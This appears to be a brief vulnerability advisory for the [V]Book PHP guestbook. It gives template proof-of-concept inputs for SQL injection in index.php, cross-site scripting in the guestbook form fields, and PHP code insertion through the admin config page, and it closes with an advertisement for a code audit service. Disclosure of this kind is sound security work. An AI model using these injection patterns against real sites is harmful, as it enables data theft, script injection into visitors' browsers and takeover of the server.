PoC/Exploit for [V]Book Multiple Vulnerabilities
Published Proof of Concept code - [V]Book Multiple Vulnerabilities.
- Description
- Available
- Solution
- Not available - check vendor's website
1. SQL Injection Example:
http://[host]/vbook/index.php?x=%' AND [sql_expression]/*
2. Cross-Site Scripting Example:
URL: http://website/vbook/index.php?a=dodaj
www: [XSS]
temat: [XSS]
tresc: [XSS]
3. PHP Code Insertion Example:
URL: http://[host]/vbook/admin.php?a=config
tlo: #BCCBCD"; [php_code] $aa="
Order Source Code Review made by eVuln team
Defend against hacking by source code audit of your website done by our team.The work will be done by experts in website security.